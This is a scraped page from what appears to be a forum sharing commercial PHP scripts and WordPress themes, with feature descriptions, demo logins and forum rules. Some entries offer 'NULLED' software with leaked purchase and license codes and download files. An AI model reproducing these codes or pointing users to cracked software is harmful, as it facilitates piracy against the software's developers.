AdvCash Stripe Paytm Perfect Money Flutterwave Manual Gateways Supported Version v1.1.0 - 04/June/2021 - Monthly/Yearly membership system added. - Some bugs solved Version v1.0 - 02/June/2021 - Initial Release. Server requirements Apache2 Web Server Apache2 mod_rewrite ON PHP 5.6, PHP 7+ MySQL Database Server Mail Server must be supportive SMTP Front-end Demo Home Page : https://refer.deluxescript.com/ Login Link : https://refer.deluxescript.com/login Email : [email protected] Pass : demopass Back-end Demo Admin Login Link : https://refer.deluxescript.com/admin Username : admin Password : demopass Detailed Documentation available under the package. Submitter Mahmoud Submitted 06/15/2022 Category Scripts Demo https://refer.deluxescript.com/ Unlimited license Yes
    1 point
  28. View File PixelPhoto - The Ultimate Image Sharing & Photo Social Network Platform PixelPhoto is a photo sharing script, PixelPhoto is the best way to start your own photo sharing website! PixelPhoto is fast, secured, and it will be regularly updated. Check out the Demo https://demo.pixelphotoscript.com/ User Features (Demo) Upload Images & Videos: Upload any image or video from your device and share it online High Performance & Capability: PixelPhoto can handle any amount of vidoes / images easily, with a very high performance and speed. WoWonder Integration: With one click, user can login to your site using WoWonder Social Network. Like: User can like videos or images. Comments System: User can comment on videos and images. FFMPEG: Limit the video upload duration using FFMPEG implemented features. User Profile: User can create his own profile and upload unlimted videos and images. SEO friendly: SEO friendly links, and HTML code that Google will love! Powerful Admin panel: Manage settings, videos, design, and a lot more easily from our admin panel. Powerful UI: Beautiful and modern design. and much more… Requirements: PHP 5.5 or Higher. MySQLi. GD Library. mbstring. cURL. allow_url_fopen. Submitter Mahmoud Submitted 12/29/2018 Category Scripts Demo https://codecanyon.net/item/pixelphoto-the-ultimate-image-sharing-photo-social-network-platform/22293358
    1 point
  29. TopLand is a real estate management laravel script. Here users or agents can publish their real estate listing based on some pricing plans and visitors can easily contact with the real estate agent to buy or sell properties. This is mainly a listing website to build connection between buyers and sellers; and you will get the SaaS version completely free in regular license. Demo: https://codecanyon.net/item/topland-laravel-real-estate-agency-portal-with-saas/36467538 Download:
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  30. View File Infix LMS - Learning Management System InfixLMS script you can sell your projects without the reseller’s commission taking half the cost of your project. All profits are just for you just need to install the script and add your products. You can set up your marketplace and accept any user to upload their products and get the selling commissin Course | Quiz | Live class(Zoom) Submitter Mahmoud Submitted 07/09/2023 Category Scripts Demo https://codecanyon.net/item/infixlms-learning-management-system/30626608
    1 point
  31. Neeon – WordPress News Magazine Theme Neeon is indisputably among the handful one of best WordPress news magazine themes. It boasts a flexible and modern layout that makes it suit any website idea easily. You can use it as easily for news and magazine websites as for blogging purposes. Neeon has all the features that any great news magazine website must-have. Its contemporary and clean layout and versatility cement its place among the few best ones. Fully Customizable Layout Variations Neeon offers various elements, including pages and sections with multiple style options. It has 6 homepage demos are available with pages and other elements and sections. You have 5 category pages on which you can arrange the various categories you have. There are also 3 different post detail pages from which you can choose yours. The 4 header styles that come with Neeon allow you to create the most elegant pages even before adding content. These header styles can do 10+ variations. The theme offers 3 footer variations too. All these layouts are fully customizable, so you can create unique displays. Theme Customizability and Customization Features With Neeon, you get to customize your website with the Elementor page builder. It offers a drag & drop interface, which means that you don’t have to touch a single line of code. It comes with over 15 custom Elementor addons that have over 45 layouts. If you don’t want to use the page builder, you can make use of the Gutenberg block builder, which is also highly user friendly and has a drag & drop functionality too. Neeon has the One-Click Demo Importer, which comes in handy when you want to import any of the 6 homepage demos. Once you choose the demo you want, you only need to click once on it, and you import it. In addition, Neeon comes with the Child Theme. It enables you to keep all the demo’s customization versions, including the original one. You can then name each version as you want and later click on the one you want at specific times. Content and Readability Features Since Neeon is intended to create websites where people can read blogs and news, it has a couple of features that enhance content display and readability. Your display of the homepage, inner pages, and presentations will be better for it. The dark mode that comes with Neeon is becoming ever so popular among app and internet users. Allowing your users to read your pieces in dark mode prevents them from straining their eyes. They can read more of your content easily and longer. The detail page has an option for the infinity scroll, where users can scroll down and read a piece until its end. Neeon has a reading progress bar that comes in handy when your users need to read long pieces. They’ll know how close they are to finishing reading them. The sticky sidebar of Neeon is perfect for your news pieces because your users may need access to some elements on it as they scroll down a news piece. Since you get access to the Google Web fonts, you can write readable pages by choosing the most readable fonts for use. Additionally, you can choose combinations that make your pieces appealing to your users. Neeon comes with over 350 Font Awesome icons. You can use them anywhere, from headers to news headings. The image blend mood option enables you to post images that match the atmosphere you want your news pieces to create. You can edit them as you post them onto the post overlays. Neeon has the option to allow your site to load the next post automatically as your visitors finish reading one. The translatability of Neeon may come in handy if you want your website to be accessible to users of different languages. What’s more, this theme is RTL ready if your target audience includes people that speak Hebrew, Persian, Arabic, among other RTL languages. Ease of Use and Accessibility Features Providing UpToDate features for your users will enhance satisfaction, which brings you closer to your goals. The design of Neeon will always remain clean and modern. Its amazing creators and development team will always give you regular updates at no charge for a lifetime. With Neeon, your website will always remain in step with the latest trends in the news niche. The creators offer quick and reliable support. They are always ready to help. However, if you want an instant response, you can turn to the detailed documentation that comes with Neeon. Neeon is 100% responsive to screens of all devices and is mobile-friendly. It also supports all modern browsers. These features make it easy for your users to access your website and have great experiences regardless of device or browser. In addition, since Neeon is Retina ready, when you have high-quality visuals, they will appear gorgeously on high-resolution displays. If you need to translate your website, Neeon has your back. It is fully translatable and comes with a ready POT file. It is also compatible with the WPML plugin and is RTL ready. This means that you can translate your website into any language you want, including left-to-right languages, such as Arabic, Persian, and Hebrew. WooCommerce Enabled If you plan to expand your blog or news sites beyond content alone, you’ll be able to use the WooCommerce integration to offer your brand products. Sell t-shirts, merchandise, posters, and anything else with a custom pre-designed shop layout. Ready to use from day one. Features Built Based on Bootstrap V 5.x Built Based on Elementor Page Builder 16 Different Home pages 5 Different Category pages 3 Different post detail pages 10 Header Style 30+ Header Variations 5 Footer variations 19 Custom Elementor addons with 60+ Layouts Dark Mode AMP Support (detail page) Infinity Scroll on detail page Category wise color Custom Width Reading Progress Bar Sticky Sidebar Fully Responsive W3C Validated HTML5 & CSS3 Coding Clean & Modern Design All Modern Browser Compatible [IE 11+, Firefox, Chrome, Opera and Safari] Font Awesome (350+ Icons). Google Web Font. Well Documented. Easy Customizable and Flexible Elements. SEO Optimized Extensive and Quick Support. Free Lifetime Updates. RTL Supported. Change logs: Version 1.8 (Mar 31, 2022) Added: a New Home Page Fixed: Elementor addon issue Update: Add some additional Control on Theme Option
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    1 point
  32. Features ------------ -- Coinpayments IPN Integration (only for purchases) -- Manual Payments - You will receive a Withdraw Request, just copy the address and send money to user, put TXID on the request and mark as Paid – Accept Dogecoin(default) or any other cripto currency accepted by CoinPayments(+700 coins) – Affiliate Program with fixed percentage – Withdraw Request Page for Mining Earnings -- Users can have multiple plans active at same time -- Automatic plan deactivation -- Payments Page with last 10 Deposits and Withdraws -- User Details(Referral List, Deposit and Withdraw History, Affiliate History, Pending Deposits, Edit email and password) Simple-Cloud-Mining-main.zip [Addon]Faucetpay Withdrawal v1.3(SCM V3.13).zip
    1 point
  33. 143 downloads

    The Ultimate Solution for Digital Savings Cards Elevate your customer loyalty strategy with Reward Loyalty, a multi-user script that allows you to effortlessly create and distribute digital savings cards. Designed with your business needs in mind, Reward Loyalty offers a powerful, manual user management system. This feature gives you complete control over your user base without the need for an automated subscription or payment service. Ideal For Different Business Needs Whether you are a company looking to reward your loyal customers with loyalty cards, an agency looking to manage multiple businesses within one installation, or a company looking to integrate a comprehensive loyalty program into existing services, Reward Loyalty is your perfect choice. Its versatile and scalable architecture allows you to build on and customize to your needs, making it a truly customizable solution for your brand.
    1 point
  34. Grupo Pro is PHP Chat script that will turn your website into a full-fledged chatroom. A use-friendly & easy to install-able PHP chatroom script with more than 150 Features. Grupo Pro Chat are equipped with security features that make hackers and spammers a thing of the past. No Flash, Java, or other browser plugins are needed to run your PHP chat script. Say goodbye to the old chatrooms, we offer a new and easy way to hold chat discussions on your site. Easily create your own chat room without any knowledge of coding.The options and features in your chat room can be adjusted according to your preference. Grupo comes with all the features that you will ever need. Grupo is an online chat room PHP script for your website. It comes with a responsive chat room for your users to experience the best online world to communicate. Demo: https://codecanyon.net/item/grupo-pro-chat-room-script/25263116 Purchase code: ea5888b5-2470-4956-a802-2ee4a74a5b8a Download:
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    1 point
  35. 1. Advertising for another source other than DoniaWeB Self promotion, social networks, ..etc. Authorized links are those of upload sites, Themeforest or identical website and DoniaWeB links. 2. Spam Whatever the nature of the content posted and judged as spam by the admin. No exceptions are made. Complaints should be made via report and with respect. 3. Disrespect To another member or to staff members. Racist, discriminating, religious intonations. If you are hateful, angry, anxious, or with any other mental imbalance: please take a break and do not log into DoniaWeB to say bullshit. Because with just one click, we will no longer hear from you, you will never have existed for us and we don't like to do it unless you push us to do it yourself by your attitude. 5. Dangerous Affiliate Links Any affiliate link judged, by the DoniaWeB staff, as dangerous or harmful to the user. Affiliate links that lead to sources that spread malicious content and violate the privacy of the user. 6. Trying to sell or make a deal without have the requirements Many of you think that DoniaWeB is the hometown market or a fish market, you come here and piss on the rules and on us by the way. And think yourself smart and trying to sell: this is prohibited and this send you directly on vacation without return back. If you want to sell, it must be an exclusive product and not available for free on the Internet. Then you can contact @Mahmoud to find out how to sell it. Last update: 2023-12-18
    1 point
  36. It's not working, it shows critical error There has been a critical error on this website. Learn more about troubleshooting WordPress
    1 point
    problem: mismatch error in pos, while already transferred and stock reading is more than sell
    1 point
  37. View File Botble - Laravel CMS, CRUD generator, Modular & Theme system, Role permissions, Multilingual blog Botble – Laravel CMS, CRUD generator, Modular & Theme system, Role permissions, Multilingual blog Botble is a CMS based on Laravel Framework that allows you to build websites for any purpose. It has powerful tools for developers to build any kind of website. All our products on Codecanyon are based on Botble CMS. Key Features Page, blog, menu, contact, gallery, statics blocks… modules are provided with the use of components to avoid boilerplate code. Multi language support. Unlimited number of languages. SEO & sitemap support: access sitemap.xml to see more Powerful media system, also support Amazon S3, DigitalOcean Spaces RESTful API using Laravel Sanctum. Custom fields: easy to add new fields to page, post, category… Google Analytics: display analytics data in admin panel. Translation tool: easy to translate front theme and admin panel to your language. CRUD generator: easy to create new plugin/package with just one command. Theme generator: generate a new theme with just one command. Widget generator: generate theme’s widgets using command. News theme are ready to use. Powerful Permission System: Manage user, team, role by permissions. Easy to manage user by permissions. Admin template comes with color schemes to match your taste. Fully Responsive: Compatible with all screen resolutions. Coding Standard: All code follow coding standards PSR-2 and best practices. Submitter Mahmoud Submitted 08/09/2023 Category Scripts Demo https://codecanyon.net/item/botble-cms-php-platform-based-on-laravel-framework/16928182  
    1 point
  38. Version v3.7


    CodyChat NULLED is the best all around chat software package we've come across that is available to the public. It is very cheap considering how well made the software is and is only held back by its php backend which prevents it from being better able to support heavy usage and some specific features such as having more than 1 private message conversation at the same time. License Code: 2a4acacca3-a1a2-a1a2-a1a2-acaccac1aa
    1 point
  39. Version v2.77.17


    Jobpilot is a modern and complete Job Portal system for your organization. With tons of feature, you can Buy, Sell And Find Just About Anything using this application. Buy And Sell Everything From Used Cars To Mobile Phones And Computers, Or Search For Property And More All Over The World!. . Key Features Laravel 8 (Latest Version) Templating system based on Bootstrap 4 Beautiful User Interface Lightweight Speed Light & Dark Theme Available Users & Roles Management Employer and Candidate Management Job Management Job Shortlisted Manage Job Featured and Highlight Job Apply and Favorite Blog Management Job Share on Social Media Blog Post Share on Social Media Pricing Plan Social Login Email Subscription Email Notification Multiple Admin Layout Multiple Countries Multiple Language Multiple Currency Multiple Payment Solutions Theme Customization Website CMS Report & Chart SEO friendly Advanced Search Application Setting Panel Powerful Admin Panel Fully Responsive
    1 point
  40. If you want to run Ultimate SMS then you have to purchase sms gateway api from sms gateway providers like twilio, nexmo, plivo etc. There have more than 130+ sms gateway api’s already integrated with ultimate sms. You can choose one from these or you can also add your gateway with ultimate sms. Then you have to update your sms api credentials on ultimate sms. Finally you can send your sms using your sms gateway api through ultimate sms. Important!: Activation Code: valid! Demo: https://codecanyon.net/item/ultimate-sms-bulk-sms-application-for-marketing/20062631 Download:
    Hidden Content.
    1 point
  41. Version 2.1.0


    onTrack 2 enables you to keep track of hardware assets, licenses and domains for your clients, get your projects organized, provide support through the powerful help desk and track and organize your work with the powerful project management feature. Now with billing, sales and expenses management, onTrack 2 will enable to you to manage your business easily from one single app. onTrack comes fully featured with credentials manager, project management, reports, user area, calendar, file manager, reminders and many more. MAIN FEATURES Dashboard Overview of your activity including active tickets, assigned issues, recent assets and licenses and finance overview. Clients Easily manage all client’s data in one single page. Assets Keep track of all the hardware you manage. Licenses Keep track of all the licenses you manage. Domains Keep track of all the domains under your administration. Projects Easy to use project management feature. Visualize and organize your work with ease with the new Kanban board feature. Tickets Use the powerful help desk feature to provide support for your clients. Ticket Auto-import from any email account via IMAP. Issues Easily track and plan all your work through issues. Tasks, Maintenance Issues, Bug Tracking, Improvement Issues or New Feature Issues, all in one place. Assign issues to other team members. Associate issues to other objects in the system like clients, assets or projects. Sales onTrack comes fully packed with Leads management, Proposals, Proformas, Invoices and Recurring Billing. Expenses Tracking Use expenses to keep track of your costs with ease. Reports Professional reports so you can get the information you need easily. Credential Manager Easily manage all your credentials. Assign credentials to assets and/or clients. User Area Easy to use user area. Your users can view their inventory, view work progress, send tickets or issues, view their billing summary, browse the knowledge base or the documentations. File Storage Keep all your files in one place. Upload files related to clients, assets or projects. Multi Language Support System can be easily translated to any language. Easy Installation, multi-entity billing and expenses system, gravatar support, email Notifications, project Management, file manager, calendar, reminders and many more… REQUIREMENTS To run onTrack 2 your hosting server must support the following: Apache/Nginx/Litespeed/Openlitespeed webserver PHP version 7.2, 7.3, 7.4, 8.0, 8.1 MySQL 5+ or compatible (MariaDB 5+) php-gd extension php-mbstring extension php-imap extension php-mysqli extension php-fileinfo extension php-iconv extension
    1 point
  42. Version Regular License


    Rio Pages - Next Gen Multi User Page Builder Start your own saas site with my innovative product. Flexible pricing, reliable, fast, and dynamic, feature packed. Enjoy Links Wanna track upcoming and previous updates changelog? Check Changelog Looking for the docs? click here. Notice If you have any questions, errors, bugs, etc, kindly text me here Contact as i will be always available for instant support. Docs Looking for the docs? click here. Updates The script will be updated within 7 days an error is found. There are no fixed dates for major updates but the next expected features will be outlined. You can also request for changes or suggestions. Zip Password:
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    1 point
  43. Redprint App Builder is your app development flow on steroid! It’s your perfect Laravel CRUD Booster and App Builder. It has everything from it’s own Terminal Emulator, A Very powerful File Browser and Code Editor (!) and lovely and fast ways to build CRUD and Model to Model Relationships. It can literally save you hundreds of hours of coding and lets you concentrate on what matters most. The application logic and problem solution. Generate SOLID API with ease! Rollback/Remove generated CRUD Code Sniffer in built to make sure your code follows best standard (PSR-0, PSR-2, PSR-4) Powerful in built Code Editor! JWT Authentication Create API Code for SPA real fast Built on top of Laravel 5.6 Totally unobtrusive. Version control and develop your app just like you do with vanilla Laravel installation! NO BLOATWARE whatsoever. Generate CRUD following latest Laravel standards. Namespace support! Built in Search and Pagination in CRUD. You can specify which fields are searchable. Image/File upload mechanism in built. Role/Permission (ACL) and User Management System (UMS) in built. Model to Model relationship building. Run all Laravel Commands from GUI. REDPRINT mode to ensure the system leaves no footprint on production application. Super fast and optimized! Demo: https://codecanyon.net/item/redprint-laravel-app-builder-crud-generator-plus/21405807 redprint-v1.6.32.zip
    1 point
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